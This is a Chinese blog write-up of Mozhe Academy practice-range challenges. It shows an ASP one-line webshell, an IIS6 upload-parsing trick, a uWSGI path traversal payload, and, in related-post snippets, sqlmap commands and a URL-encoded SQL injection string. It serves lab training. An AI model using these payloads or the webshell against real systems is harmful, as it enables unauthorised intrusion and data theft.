墨者学院在线靶场WP

已于 2023-02-22 11:14:16 修改
阅读量981 收藏 2
点赞数 3
分类专栏: 笔记 文章标签: 安全 web安全 网络安全
于 2022-12-22 16:05:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Swaynie/article/details/128408645
版权
本文详述了多个网络安全领域的漏洞复现,包括内部文件上传系统漏洞、uWSGI CVE-2018-7490、Webmin远程代码执行、Ruby On Rails的CVE-2018-3760和CVE-2019-5418,以及X-Forwarded-For注入漏洞。通过过程和原理分析,深入理解这些安全问题。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

一、内部文件上传系统漏洞分析溯源

过程

1.访问靶场
在这里插入图片描述
2.准备asp一句话木马

<%eval request("MH")%>

在这里插入图片描述
3.上传asp.txt,抓包,修改参数
在这里插入图片描述
4.放包,蚁剑连接
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

原理

IIS6.0目录解析:
以*.asp命名的文件夹下,里面的文件都将会被当成ASP文件执行

二、uWSGI 漏洞复现(CVE-2018-7490)

过程

1.访问靶场

在这里插入图片描述
2.poc

/..%2F..%2F..%2F..%2F..%2Fkey.txt

在这里插入图片描述

原理

uWSGI 2.0.17之前的PHP插件,没有正确的处理DOCUMENT_ROOT

最低0.47元/天 解锁文章
文件上传漏洞—简单利用(学院靶场
weixin_44431280的博客
02-24 2231
文件上传漏洞—简单利用(学院靶场) 说明:文章中涉及的网站信息皆是学院靶场环境,不涉及互联网真实环境,仅供学习。 信息收集: 访问目标靶场地址,得到如下界面,根据google插件Aappalyzer判断目标靶场信息: Web容器:Apache 脚本语言:PHP 操作系统:Ubuntu(linux) 测试过程: 1,根据功能点判断此处可能存在文件上传漏洞,尝试上传扩展名为txt和php的文件,发现扩展名为txt的文件可以正常上传,但是php后缀的文件上传失败 2,上传文件poc.txt,使用Bur
学院-XWAY科技管理系统V3.0
lianliandad的博客
09-15 3986
妙啊
学院靶场练习
cndydmz的博客
12-06 1379
1.SQL注入漏洞测试(布尔盲注) 首先进入靶场, 然后点击上图通知,进入 然后打开sqlmap 输入sqlmap -u http://219.153.49.288:40866/new_list.php?id=1 --current -db 获取数据库名 得到数据库名为stormgroup 然后输入sqlmap -u http://219.153.49.228:45907/new_list.php...
学院-在线靶场
weixin_42730900的博客
02-23 4265
浏览器信息伪造 更改user-agent:Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A365 MicroMessenger/6.0 NetType/2G ## 来源页伪造
学院在线靶场--WEB安全--SQL注入
m0_59022585的博客
07-09 1688
测试注入禁用password,注入-1+%75nion+%73elect+1,%64atabase(),(%73elect+group_concat(%70%61%73%73%77%6f%72%64)+%66rom+%73%74%6f%72%6d%67%72%6f%75%70%5f%6d%65%6d%62%65%72),4回显得到三个MD5加密的密码。
靶场部分wp_logs
m0_58543272的博客
08-20 1022
者的靶场wp集合(努力更新中)
学院在线靶场--网络安全
m0_59022585的博客
07-09 274
确定用户名和密码都为admin,进行登录得到提示进制登录,将插件X-Forwarded-For HeaderIP地址设置为127.0.0.1,再次登录得到key。进入超级链接,进行投票(只能投一次),使用插件X-Forwarded-For Header设置一个IP地址并进行投票,同时用Burp Suite.vbs抓包。使用Burp Suite.vbs进行爆破,再发送给服务器进行刷票(当IP不足时,可以更改前几位),再次登录可以得到key。打开Burp Suite.vbs,对超级链接进行抓包。
靶场 初级:WordPress 远程命令执行漏洞(CVE-2018-15877)复现
qq_43233085的博客
01-21 1531
靶场 初级:WordPress 远程命令执行漏洞(CVE-2018-15877)复现题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 fck编辑器利用。 实训目标 1、学会利用搜索引擎寻找通用程序组件的漏洞利用方式。 2、了解一句话木马的使用。 3、了解burp的基本使用。 4、学会利用iis解析漏洞。 解题方向 根据题目提示,进行网站测试。 解题步骤 启动靶机,访问链接。 使用御剑扫...
渗透测试练习靶场汇总
zz12345600354的博客
05-02 366
Vulfocus 官网:在线演示:2.BUUCTF在线评测writeup文章:https://github.com/niudaii/my-vulstack-wphttps: //
学院 在线靶场 HTTP动作练习
weixin_60937978的博客
04-21 379
抓包 把GET改成POST,把中间的content剪切到末尾,去掉问号 bug zh 正确答案
靶场(综合)
曹振国的博客
06-20 2253
初级 综合表单暴力破解实训(第1题)提示:直接使用BurpSuite抓包跑数字HTML前端代码分析(暗链)提示:打开页面:访问得到key值:SVN信息泄露漏洞分析(第1题)背景介绍提示:1.使用dirsearch扫描地址2.使用Navicat Premium打开备份文件3.访问地址得到key值WEB页面源代码查看提示:F12看的key值 表单暴力破解实训(第1题) 提示: 直接使用BurpSuite抓包跑数字 成功拿到key HTML前端代码分析(暗链) 提示: 打开页面: 查看源码发现有一
学院在线靶场中SQL手工注入漏洞测试(MySQL数据库)
qq_47271638的博客
05-07 753
学院在线靶场中SQL手工注入漏洞测试(MySQL数据库) 打开环境 点击箭头指向链接 观察网页的URL发现有id=1,可能存在SQL注入点。 首先对URL进行尝试猜列名数量(字段数),在URL后面添加order by 1或者2 直到出现页面不在显示正常页面,这就说明存在的字段数应该是现在所输入的数字减1。 此处order by 4页面显示正常而order by 5出现页面不正常显示说明只存在4个字段(注此方法只适用于字段数不是很多的时候)。 然后查看哪个字段能显示出来 在URL后面联合查询 un
在线靶场
2302_80256359的博客
12-05 537
访问靶场后点击公告即可看见url中有ID参数。将得到的密码进行md5解密。将得到的密码进行md5解密。将得到的密码进行md5解密。将得到的密码进行md5解密。进入在线靶场的公告页面。该表中一共存在3个列。成功登录后获取Key。成功登录后获取Key。成功登录后获取Key。成功登录后获取Key。
学院;SQL手工注入;在线靶场;SQLsever;
xiaochenhang的博客
08-21 1342
object ():数据库中每个对象都有一个唯一的id值,object_id(name)可以根据表对象名称得到表对象的ID,object_id()只能返回用户创建的对像的ID,像以sys开头的表都是系统表所以返回不了的。sa权限:数据库操作,⽂件管理,命令执⾏,注册表读取等system:SQLServer数据库的最 ⾼权限。syscolumns:记录了数据库中所有表的字段,常⽤字段为id、name和xtype。id为标识,name为对应的表名和字段名,xtype为所对应的对象类型。
学院在线靶场writeup
john_david_的博客
02-14 5813
入门 WEB页面源代码查看 打开是一个HTML页面,鼠标右键被禁用,直接F12,控制台点Elements看源代码,就发现key了 WEB页面分析 打开靶场F12,看到注释,按照注释方法构造url,index.php?url=login.php,跳转拿到key 服务器返回数据查看 F12打开控制台,点击network,点击ip,点heards,然后展开response就可以看到key 浏览器信息伪造...
网络安全|学院在线靶场|投票系统程序设计缺陷分析
没有
02-20 5391
网络安全|学院在线靶场|投票系统程序设计缺陷分析
学院靶场自动解题
qq_55733466的博客
09-07 963
本文演示了python程序自动进行靶场解题的效果。
靶场训练
weixin_45540609的博客
09-04 2624
一、request数据包格式 1.请求行:请求类型/请求资源路径、协议的版本和类型 2.请求头:一些键值对, 浏览器与 web 服务器之间都可以发送,特定的某种含义 3.空行:请求头与请求体之间用一个空行隔开; 4.请求体:要发送的数据(一般 post 提交会使用);例: user=123&pass=123 # Request Headers POST /adduser HTTP/1.1 Host: localhost:8030 Connection: keep-alive Content
学院 靶场练习(一) SQL注入
a519395243的博客
12-20 8291
学院 在线靶场 工具: sqlmap 第一题: SQL手工注入漏洞测试(MySQL数据库-字符型) 利用工具 可以很快速注入,手工注入请看 https://blog.csdn.net/qq_42357070/article/details/81215715   进来点击公告   sqlmap 用于 mysql注入的步骤: 1:查找数据库 ./sqlmap.py ...
学院sql手工注入
最新发布
03-03
学院提供了一个专门用于练习SQL注入技巧的安全测试平台[^2]。此靶场基于Nginx+PHP+MySQL架构构建而成,并且访问成本低廉——仅需消耗一枚虚拟货币“币”,新用户注册时通常会被赠送足够的余额来进行多次尝试而...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Swaynie

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值